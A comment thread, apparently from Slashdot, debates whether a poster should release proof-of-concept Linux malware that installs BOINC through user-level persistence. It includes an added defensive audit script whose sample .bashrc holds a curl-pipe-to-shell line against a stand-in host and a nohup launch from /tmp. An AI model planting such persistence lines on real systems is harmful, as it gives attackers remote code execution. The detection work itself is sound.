Your problem here is that your idea will only affect the *USER* environment, not the machine. Anything you run or install into the user environment will be bound by the standard user accounts everyone should be running as, without privileges (such as root/super user).
This separates the privileges from the user and the system quite well and delineates it.
Let's compare Windows and *NIX (in general):
Windows: I can send you an e-mail and your standard user just looks at my e-mail and via ActiveX can leverage a 10 year old exploit to install a service as a *SYSTEM ACCOUNT*. This means my process then has full access to the system... Possibly being able to wipe out the machine period, or use it for a launching pad to send out e-mails to other accounts on the system or other accounts in any address book or just grab your passwords (probably being abcd1234 or password or what have you (Think Sarah Palin's Yahoo account... wooo really good password there)) for your Bank account. It's very much *THAT* simple, no stupidity involved.
Now, if for some reason ActiveX is disabled, I can just tell you how important the Microsoft update is and it needs to be run... and how you *MUST* forward it to your friends so they can be safe... Sheeple are gullible and will never be safe from this stupidity.
Now speaking of stupidity, it's really the only way Linux/*NIX/*BSDs will be compromised... even then most likely only the *user's* data will be flogged. Not the whole system. Now, let us just say *I* download and run your program/update/shell/python script/perl script/etc... Sure it downloads and installs the BOINC daemon and runs in the background... to be honest who cares. Any program you run or have running to capture data from the user will only affect the *USER* not the whole system. Separation of privileges is pure and simple why the *NIX systems will not seriously fall prey to these kinds of things. And to be honest, unless you install a persistent AT job for the BOINC daemon to start or at the very least a cronjob that runs every minute... a reboot will kill your pitiful attempt.
greg, REMEMBER ED CURRY!!!
A father used to rationalize why he was so mean to his son by saying, "I'm getting him ready for the world, because it is mean." By that rationale, the best thing would be to simply dump the child out on the streets.
If you see flawed code, submit a patch.
If you see flawed usage, educate users (documentation, blog article, forum posts).
And you have nothing better to do than break things and show others how to make a mess.
My son's system got hacked that way [backwards "..."] "Here download this program, run it, ignore any warnings, choose 'allow' for every UAC prompt, and then it will give me remote control of your system so I can 'fix' it for you." [...] I was busy in the other room [...] Teenagers, sheesh, looking for the quick fix, but adults are just as dumb and fall for the same thing as there are so many helpful strangers on the Internet
The problem, as I see it (and it's only a guess, but hear me out), is one of conditioning.
Windows (I've used 95, 98, XP) tends to warn about pretty harmless stuff. "Are you sure? Only click yes if you want me to do what you just asked me to." Or "Warning: [weird undecipherable sentence about cryptography that will take those who know about crypto a good 15 minutes of research to answer the right way with a modest success rate]. Yes or no?" And clicking "Yes" always works. "Warning: running this program might have side effects (as opposed to just spending its cycles making your CPU hotter). Run it?"
A lot of repeated trials of this ought to condition users to take warnings with a grain (well, bucket) of salt. Add on top of this all the experiences where they copy-paste the error message into google, find a forum post which fixes their problem, or ask someone on IRC and they provide the solution, and people will learn to trust strangers on the internet (because said trust is most often warranted).
Ask yourself how you solve technical problems with your boxes. Do you research everything yourself? Or do you use google/IRC/...?
I don't know exactly how the situation looked through the eyes of said teenagers. Did it really explicitly say "let me take control of your computer"? By your own statement, you were away when it happened. Did you go back and look afterwards?
Most of the things you find on the net are the good stuff. Windows conditions users into not taking warnings as a serious sign of (potential) danger. Is doing what your environment tells you is the right thing called "looking for the quick fix" these days?
Wrong. The Macs are hacked first because they come with QuickTime Player, which is a bug-ridden piece of shit that Apple refuses to maintain properly.
If you have quicktime on your box, someone out there can own you, simple as that.
then show this code to whomever it will help actually fix those holes but try not to release it to the public at large
I'm sorry to bring up an argument that everyone has already heard (or worked out on their own), but I think it warrants saying (yet again):
How about also releasing information about workarounds to the countless systems administrators who are in a position to deploy that workaround? (Good luck on doing that while not releasing information to the general public)
I'd bet half of the people who mock windows users for downloading and installing untrusted software would download this, type in their root password, and let it install.
Why wouldn't they compile it with --prefix=~/local/ instead? That way, you know where you install all your shi^Wsoftware...
I would certainly say so. I would say that the moral behavior "emerges" from the crowd, the same way your consciousness "emerges" from the neurons in your brain, even though no individual neuron is conscious. Democracy is premised on a similar idea.
I don't think it matters what I write here... you will release it.
Doesn't that just make it 'ware'?
so I wrote some code and spread the s**t from the windows world to the other worlds just to point out that I in fact hate lunix people for being cool.
In too many cases, the questions are along the lines of "I don't feel like doing my homework" or stuff like that. Or questions that could have been answered with the first search result from the text of the question itself. Or they're really slashvertisements. That's why many of these go off-topic; once 20 people have posted "justfuckinggoogleforit", there's not much more on-topic.
In this case, the poster was either looking for absolution or wanted to brag a bit.
Now, as to doing away with "Ask Slashdot" - why not Ask Slashdot?
Personally, I have no problem with it, but then again, I have no problem with idle.slashdot.org either, so you can be excused for thinking I might be slightly brain-damaged.
If you're referring to the article from a couple of weeks ago (by the "the Windows 7 UAC was tested against 10 newest mallware and almost all went totally trought from it, without giving anykind UAC question" line), none of the 'mallware' in question that passed through required administrator privileges for anything in the first place, and UAC wouldn't have triggered for it under Vista or the highest settings in 7.
Do you even know what UAC is for?
If you have to ask the community if it's ethically appropriate for you to release this code probably means that you shouldn't.
The fact that you don't know for yourself and you have to ask the community tells me that you probably shouldn't have the skillset you do, for you could potentially use your knowledge for nefarious purposes.
Contact the security arm of all major distributions as well as senior Linux devs. Be willing to submit the code to those specified vendors so they can start to take action. Then write it up but do not release any code (work with the vendors to identify when appropriate advisories will be released).
Someone else will take your work (paper) and develop something evil, so giving vendors time to respond prior to release is important.
Even your posting on slashdot will now have evil doings scrambling to figure out what you did for their own purposes.
Great work! This has the potential to step up the security stance of the standard Linux systems as released by vendors.
Good luck.
Release it. It's not malware in the way that windows malware gets spread. My Linux and FreeBSD boxes ARE more secure than your windows boxes.
If it can't be installed without user interaction, it's useless here on /.
Me thinks it's a hoax and flamebait.
I say things which affects my Karma negatively. (and I don't care) For instance; All religion is false.
Good and evil.
Both fine choices, whatever floats your boat.
If you've got a good package, present it to the NSA. They'll DEFINITELY want to hear about it. Possibly a consultancy.
So what does it mean when there's a contest about hacking into Mac, Windows, & Linux... and Mac gets taken out first? http://www.pcpro.co.uk/news/249768/safari-falls-in-10-seconds-at-hacking-contest No marketshare to worry about in that contest, just PWN 2 OWN.
The problem with all weapons is idiots like you who were bored and had no other avenue of displaying their talents. Give you kudos for coming out and talking about it, but seriously, get a life.
Send it over to Secunia and CERT. They know who it needs to get to, and know how to release it properly. And, to boot, you get the credit for it.
It's a fucking no-brainer here. And if you are really a _________hat, you would have already known to do this. I think you don't have any code, just a possible attack vector. Either way, send it over to them, they release it after coming up with code (if yours is broken) a week or two after notifying the vendor. And you get credit for discovering it.
You'll only get sued if you do it the wrong way: ie attaching your name to it and releasing it to the wild.
... still work and their friends with windows, well, don't.
So go ahead, release the code, I'm not worried. He might even infect 100 machines! Woop de do. If I put the same effort into a windows virus, I could probably own millions in just a matter of days. I don't need a proof of concept, there are plenty of real world examples. Most machines STILL run as admin in the windows world.
Sigh, that would have been an excellent plot: using Linux malware to take over the world.
The BOINC license agreement states that you will only install BOINC on machines for which you have the permission of the owner of the machine.
i run Debian GNU/Linux with stumpwm and sawfish as main "desktops". there is no sudo on my box and just one sources.list entry of an official secondary mirror in my hometown (i know the admin personally). i download just from the main repository (vrms gives null results i.e. i get just trusted high quality software). i got iptables, ebtables, rkhunter, tiger, chkrootkit, unhide, ossec-rootcheck, tripwire, custom hosts file, hosts.allow, all unnecessary tty's disabled, just one port open for lsh (which only allows gpg authenticated connections into an underprivileged dummy account), my main browser is w3m via surfraw, got my own dns server, web proxy, the only udp port open is the one for dhcp and my router got its own firewall, bla bla bla bla bla... you think you can put something in my bashrc? o.k. try it. if you succeed i send you back a nice present! but don't cry when your windoof box breaks you little wannabe script kiddy! i guess you couldn't even crack the bashrc on my HURD system if i gave you an account on it...^_^
Well your mod just went away when you replied to that comment. Thanks. ;)
SIG FAULT: Post index out of bounds.
If you're so afraid, release it, but don't open-source it. Though since you have made this already anyway, people are going to make their own malware eventually.
I am not devoid of humor.
Just send it to me. I'll keep it safe.
A lot of popular closed-source apps like Skype and Flash are available as .deb packages, and if someone is used to downloading .exe and .msi files from random places it's no big leap to do the same with a .deb.
And this is really bad, because it breaks the whole "use one single - or a reduced number - of trusted sources" security principle behind Linux distribution.
Thankfully, some of this software comes with a license which allows it to be repackaged by distributors (often the case with Flash).
Sometimes, the distributor tries to mitigate the problem by providing a 'fetcher' package, which doesn't repack the proprietary software but attempts to retrieve a known-good version from a known-good source (Microsoft's Core Fonts are often programmatically downloaded that way). But nonetheless this makes the user more reliant on external sources.
Nonetheless, proprietary closed-source applications like Skype pose security threats by themselves, lacking the amount of eyeballs as stated in ESR's "Linus' law".
GO TO HELL!!!! If you release this malware, you will soon see truly malicious viruses for linux. Linux is more secure than windows, but not as much as some users like to think. If you release this or already did, may you be Bill's towel boy in hell for eternity, and may Steve Ballmer shove a Pineapple up your @$$.
How are Windows Vista and Windows 7 better than XP, in screening out the malware? How is Macintosh better? I will buy a new computer soon. I really need to know!
Perhaps you could refactor it as an analysis tool? It could still be malware-ish, inserting itself into cron and wherever, but regularly checking for the original openings, and suggesting ways to close the gaps.
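The "analysis tool" idea above, and the earlier point that user-level persistence lives in cron, at jobs and shell startup files, can be turned into a small audit script. This is an added example, not code from the thread or from the OP's package: it scans a user's crontab, at queue, ~/.bashrc, ~/.profile and XDG autostart entries for lines that fetch-and-execute from the network or launch binaries from world-writable directories. The regex, the file list and the sample .bashrc are constructed assumptions to tune for your own environment.

```shell
#!/bin/sh
# Added example (not from the thread): audit user-level persistence spots
# for entries worth a second look. Flags lines that pipe curl/wget into a
# shell, run things from /tmp, /dev/shm or /var/tmp, decode base64 inline,
# background a process with nohup, or use the @reboot cron shorthand.
# Pattern list is a constructed starting point, not a complete signature set.
SUSPICIOUS_RE='(curl|wget)[^|]*[|][[:space:]]*(ba|z|da)?sh|/tmp/|/dev/shm/|/var/tmp/|base64[[:space:]]+(-d|--decode)|nohup[[:space:]]|@reboot'

# scan_stream LABEL : read stdin, print "LABEL:LINENO:line" for each
# flagged non-comment line (comment lines are ignored so documented
# examples in a dotfile do not trigger it).
scan_stream() {
    label=$1
    grep -nE "$SUSPICIOUS_RE" | grep -vE '^[0-9]+:[[:space:]]*#' | sed "s|^|$label:|"
}

# scan_file PATH : scan one file, silently skipping files that do not exist.
scan_file() {
    [ -r "$1" ] || return 0
    scan_stream "$1" < "$1"
}

# count_findings PATH : number of flagged lines in PATH (0 if missing).
count_findings() {
    scan_file "$1" | wc -l | tr -d ' '
}

# audit_user : check the calling user's own persistence locations.
audit_user() {
    for f in "$HOME/.bashrc" "$HOME/.profile" "$HOME/.bash_profile" \
             "$HOME/.zshrc" "$HOME/.config/autostart"/*.desktop; do
        scan_file "$f"
    done
    # crontab -l prints the user's crontab; absent crontab just yields nothing.
    crontab -l 2>/dev/null | scan_stream "crontab"
    # at(1): atq lists queued job ids, at -c prints the job's script body.
    if command -v atq >/dev/null 2>&1; then
        atq 2>/dev/null | awk '{print $1}' | while read -r id; do
            at -c "$id" 2>/dev/null | scan_stream "at-job-$id"
        done
    fi
}

# make_sample : write a constructed ~/.bashrc-style file for the demo and
# print its path. Two of its lines are the kind the thread describes.
make_sample() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# constructed sample .bashrc for the demo (this comment line is ignored)
export PATH="$HOME/bin:$PATH"
alias ll='ls -l'
(curl -s http://example.invalid/boinc.sh | sh) >/dev/null 2>&1 &
nohup /tmp/.x/boinc_client >/dev/null 2>&1 &
EOF
    printf '%s\n' "$f"
}

# Demo on the constructed sample; run audit_user for your real account.
sample=$(make_sample)
scan_file "$sample"
echo "flagged lines: $(count_findings "$sample")"
rm -f "$sample"
```

Running `audit_user` on a real account prints nothing when nothing matches; review each flagged line by hand, since legitimate `@reboot` jobs and scratch-dir scripts will show up too.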
Someone just vomited on my monitor??!?
Oh, no, it's just the Karmic colour scheme! ;)
If it is the same Johannes Buchner that I found through Google, then he lives in Austria, so that specific law doesn't apply to him.
You make a good point that US law shouldn't necessarily be his first worry, but even if his own country doesn't have a similar law against making malware, then there's always the possibility of extradition.
(See the case of Gary McKinnon for one example of a UK citizen that we're working to extradite for hacking charges, and the case of Sholam Weiss (on fraud and money laundering charges) for proof that we do have an extradition treaty with Austria.)
If it's for-profit but free, you're not the customer -- you're the product (e.g., the Slashdot Beta's "audience").